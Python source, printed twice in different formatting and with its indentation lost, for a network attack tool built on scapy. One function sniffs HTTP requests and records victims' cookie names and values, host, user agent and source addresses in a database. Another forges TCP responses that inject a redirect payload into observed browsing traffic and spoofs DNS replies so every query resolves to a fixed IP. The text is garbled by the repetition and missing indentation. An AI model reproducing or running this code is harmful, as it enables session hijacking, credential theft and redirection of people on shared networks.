def process(pkt):
if pkt.haslayer(TCP):
if pkt.haslayer(Raw):
tcpdata = pkt.getlayer(Raw).load
if tcpdata.startswith("POST ") or tcpdata.startswith("GET "):
ether_src = 'None_observed'
if (pkt.haslayer(Ether)):
ether_src = pkt.getlayer(Ether).src
cookie = helper.getcookie(tcpdata)
host = helper.gethost(tcpdata)
useragent = helper.getuseragent(tcpdata)
address = helper.getdsturl(tcpdata)
ip_src = pkt.getlayer(IP).src
if cookie != None:
cookie = ''.join(cookie)
else:
cookie = ''
if host != None:
host = ''.join(host)
else:
host = ''
if useragent != None:
useragent = ''.join(useragent)
else:
useragnet = ''
if address != None:
address = ''.join(address)
else:
address = ''
if cookie != '':
cookies = cookie.split(';')
for name_val in cookies:
eq = name_val.find('=')
name = name_val[0:eq].strip()
val = name_val[eq + 1:].strip()
db_insert(ether_src, host, name, val, address, useragent,
ip_src)
def process(pkt):
if pkt.haslayer(TCP):
if pkt.haslayer(Raw):
tcpdata = pkt.getlayer(Raw).load
if tcpdata.startswith("POST ") or tcpdata.startswith("GET "):
ether_src='None_observed'
if(pkt.haslayer(Ether)):
ether_src=pkt.getlayer(Ether).src
cookie=helper.getcookie(tcpdata)
host=helper.gethost(tcpdata)
useragent=helper.getuseragent(tcpdata)
address=helper.getdsturl(tcpdata)
ip_src=pkt.getlayer(IP).src
if cookie != None:
cookie=''.join(cookie)
else:
cookie=''
if host != None:
host=''.join(host)
else:
host=''
if useragent != None:
useragent=''.join(useragent)
else:
useragnet=''
if address != None:
address=''.join(address)
else:
address=''
if cookie != '':
cookies = cookie.split(';')
for name_val in cookies:
eq = name_val.find('=')
name = name_val[0:eq].strip()
val = name_val[eq+1:].strip()
db_insert(ether_src,host,name,val,address,useragent,ip_src)
def pkt_callback(pkt):
if pkt.haslayer(scapy.Dot11):
#print("got Wifi packet")
# construct fake l2 for wifi packet
macl = pkt.getlayer(scapy.Dot11)
l2 = scapy.RadioTap() / scapy.Dot11(
addr1=macl.addr2,
addr2=macl.addr1,
addr3=macl.addr3,
FCfield="from-DS") / scapy.LLC(ctrl=3) / scapy.SNAP()
elif pkt.haslayer(scapy.Ether):
#print("got Ethernet packet")
# construct fake l2 for ethernet packet
macl = pkt.getlayer(scapy.Ether)
l2 = scapy.Ether(dst=macl.src, src=macl.dst)
else:
print("protocol neither ethernet nor wifi, skipping")
return
if pkt.haslayer(scapy.IP):
# construct fake l3
ipl = pkt.getlayer(scapy.IP)
l3 = scapy.IP(src=ipl.dst, dst=ipl.src)
else:
#print("this is not IP packet, skipping")
return
if pkt.haslayer(scapy.TCP):
#print("we have TCP packet")
# construct fake layer 4 for TCP
tcpl = pkt.getlayer(scapy.TCP)
l4 = scapy.TCP(dport=tcpl.sport, sport=tcpl.dport)
if tcpl.flags == 2: # syn
return
elif tcpl.flags == 24 or tcpl.flags == 16: # psh ack
if pkt.haslayer(scapy.Raw):
#print("packet has some data")
tcpdata = pkt.getlayer(scapy.Raw).load
if tcpdata.startswith("GET "):
#print("TCP data starts with GET")
dsturl = helper.getdsturl(tcpdata)
if dsturl is None:
return
print("IP: %s, DST URL: %s" %
(pkt.getlayer(scapy.IP).src, dsturl))
if dsturl.find('0x0a') != -1 or dsturl.find(
'85.17') != -1 or dsturl.find(
'twitter') != -1 or dsturl.find(
'facebook') != -1 or dsturl.find(
'vk.com') != -1 or dsturl.find(
'blogger') != -1 or dsturl.find(
'odnoklassniki') != -1:
print "inject success"
return
#credirpkt = redirpkt % {'url': "http://0x0a.net/" }
credirpkt = redirpkt
# construct reply packet
pktreply = l2 / l3 / l4
pktreply.getlayer(scapy.TCP).seq = tcpl.ack
pktreply.getlayer(scapy.TCP).ack = tcpl.seq + len(tcpdata)
pktreply.getlayer(scapy.TCP).flags = "PA"
# construct fin packet
finpktreply = pktreply.copy()
finpktreply.getlayer(scapy.TCP).flags = "FA"
finpktreply.getlayer(scapy.TCP).seq += len(credirpkt)
# add redir payload to reply packet
pktreply.getlayer(scapy.TCP).add_payload(credirpkt)
packetbasket = [pktreply, finpktreply]
# send reply packet
scapy.sendp(packetbasket, verbose=0, iface=interface)
print("Reply sent")
return
elif tcpl.flags == 17: # fin ack
return
elif pkt.haslayer(scapy.UDP):
# construct layer 4 for UDP
udpl = pkt.getlayer(scapy.UDP)
l4 = scapy.UDP(dport=udpl.sport, sport=udpl.dport)
if pkt.haslayer(scapy.DNS):
#print("We got DNS packet")
dnsl = pkt.getlayer(scapy.DNS)
if dnsl.qr == 0:
print("We got DNS request packet: %s" % (dnsl.qd.qname))
pktreply = l2 / l3 / l4 / scapy.DNS(
id=dnsl.id,
qr=1,
qd=dnsl.qd,
an=scapy.DNSRR(
rrname=dnsl.qd.qname, ttl=10, rdata="85.17.93.121"))
scapy.sendp([pktreply], verbose=0, iface=interface)
print("Reply sent")
return
else:
print("protocol not TCP or UDP, skipping")
#pkt.show()
return
def pkt_callback(pkt):
if pkt.haslayer(scapy.Dot11):
#print("got Wifi packet")
# construct fake l2 for wifi packet
macl = pkt.getlayer(scapy.Dot11)
l2 = scapy.RadioTap() / scapy.Dot11(addr1 = macl.addr2, addr2 = macl.addr1, addr3 = macl.addr3, FCfield="from-DS") / scapy.LLC(ctrl=3) / scapy.SNAP()
elif pkt.haslayer(scapy.Ether):
#print("got Ethernet packet")
# construct fake l2 for ethernet packet
macl = pkt.getlayer(scapy.Ether)
l2 = scapy.Ether(dst = macl.src, src = macl.dst)
else:
print("protocol neither ethernet nor wifi, skipping")
return
if pkt.haslayer(scapy.IP):
# construct fake l3
ipl = pkt.getlayer(scapy.IP)
l3 = scapy.IP(src = ipl.dst, dst = ipl.src)
else:
#print("this is not IP packet, skipping")
return
if pkt.haslayer(scapy.TCP):
#print("we have TCP packet")
# construct fake layer 4 for TCP
tcpl = pkt.getlayer(scapy.TCP)
l4 = scapy.TCP(dport = tcpl.sport, sport = tcpl.dport)
if tcpl.flags == 2: # syn
return
elif tcpl.flags == 24 or tcpl.flags == 16: # psh ack
if pkt.haslayer(scapy.Raw):
#print("packet has some data")
tcpdata = pkt.getlayer(scapy.Raw).load
if tcpdata.startswith("GET "):
#print("TCP data starts with GET")
dsturl = helper.getdsturl(tcpdata)
if dsturl is None:
return
print("IP: %s, DST URL: %s" % (pkt.getlayer(scapy.IP).src, dsturl))
if dsturl.find('0x0a') != -1 or dsturl.find('85.17') != -1 or dsturl.find('twitter') != -1 or dsturl.find('facebook') != -1 or dsturl.find('vk.com') != -1 or dsturl.find('blogger') != -1 or dsturl.find('odnoklassniki') != -1:
print "inject success"
return
#credirpkt = redirpkt % {'url': "http://0x0a.net/" }
credirpkt = redirpkt
# construct reply packet
pktreply = l2 / l3 / l4
pktreply.getlayer(scapy.TCP).seq = tcpl.ack
pktreply.getlayer(scapy.TCP).ack = tcpl.seq + len(tcpdata)
pktreply.getlayer(scapy.TCP).flags = "PA"
# construct fin packet
finpktreply = pktreply.copy()
finpktreply.getlayer(scapy.TCP).flags = "FA"
finpktreply.getlayer(scapy.TCP).seq += len(credirpkt)
# add redir payload to reply packet
pktreply.getlayer(scapy.TCP).add_payload(credirpkt)
packetbasket = [pktreply, finpktreply]
# send reply packet
scapy.sendp(packetbasket, verbose = 0, iface = interface)
print("Reply sent")
return
elif tcpl.flags == 17: # fin ack
return
elif pkt.haslayer(scapy.UDP):
# construct layer 4 for UDP
udpl = pkt.getlayer(scapy.UDP)
l4 = scapy.UDP(dport=udpl.sport, sport=udpl.dport)
if pkt.haslayer(scapy.DNS):
#print("We got DNS packet")
dnsl = pkt.getlayer(scapy.DNS)
if dnsl.qr == 0:
print("We got DNS request packet: %s" % (dnsl.qd.qname))
pktreply = l2 / l3 / l4 / scapy.DNS(id=dnsl.id, qr=1, qd=dnsl.qd, an=scapy.DNSRR(rrname=dnsl.qd.qname, ttl = 10, rdata="85.17.93.121"))
scapy.sendp([pktreply], verbose = 0, iface = interface)
print("Reply sent")
return
else:
print("protocol not TCP or UDP, skipping")
#pkt.show()
return
